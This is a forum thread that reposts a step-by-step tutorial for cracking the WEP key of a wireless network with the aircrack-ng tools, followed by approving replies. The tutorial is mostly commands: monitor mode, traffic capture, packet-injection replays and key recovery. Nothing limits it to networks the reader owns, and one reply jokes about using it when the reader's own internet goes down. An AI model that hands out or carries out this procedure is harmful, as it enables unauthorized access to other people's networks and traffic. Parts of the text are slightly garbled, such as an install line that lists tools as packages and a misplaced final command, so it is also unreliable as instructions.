I figured this was the closest category for this tutorial. So here you go!
I did not write this I just thought this would be a good one to share, my source will be at the bottom.
In this tutorial we will be using Kismet.
Just put in this command in a terminal to download it straight to your computer.
WEP CrackingCode:sudo apt-get install aircrack-ng airmon-ng airodump-ng aireplay-ng kismet
1. Put your Wireless Interface into Monitor Mode:
(In this example our interface is ‘wlan0′ – To find out your wireless interface type: iwconfig scan or airmon-ng)Code:airmon-ng start wlan0
2. Get Info from the Available Networks:
(mon0 is the monitored wlan0 interface)Code:airodump-ng mon0
3. Select one network that uses WEP encryption. In our Example the network is named SKIDHACKER. Now, get more info on the specific Network:
(‘channel’ is the Channel Number) (‘filetosave’ is the file that airodump-ng will save its data) (‘macaddrs’ is the MAC Address of the Network) —> All this info is provided by the command used in Step 2.Code:airodump-ng -c channel -w filetosave –bssid macaddrs mon0
4. To boost the proccedure type on a new terminal:
(‘bssid’ is the MAC Address of the Network)Code:aireplay-ng -1 0 -a bssid mon0
5. When this command is done, capture packets by typing:
(‘bssid’ is the Networks MAC Address)Code:aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b bssid mon0
6. When the above command gets about 20.000 – 30.000 packets you are now able to crack the network by typing:
(where instead of ‘filename’.cap you enter the file that aireplay-ng saved at your current directory – This file is named wep-x.cap –x is a number, starting from ’01′, then ’02′ etc….–) (Instead of the ‘wep-01.cap’ you can use the ‘wep*.cap’ as in the example to ‘Auto-Select’ the file)Code:aircrack-ng filename.cap
7. When aircrack-ng finds the key it will display something like:
(In this example our key is ’1234567890′)Code:KEY FOUND! [ 12:34:56:78:90 ]
8. When Finished, make sure you put your wireless interface back to original Mode by typing:
There is also tutorials for other types of WIFI encryption types.Code:airmon-ng stop wlan0
Last edited by LEzStarz; 08-14-2012 at 09:50 PM.
~Moved to Misc Tutorials, nice job.
Nicely done dude, gonna try this later in case my net goes off :lol:
You could also use WEP Buster which is baked into BackTrack 4.
Automated and works great
Nice tut dude.
I can confirm this works as I've done this before the tutorial xD.I actually still have backtrack5 installed.
great . :claps: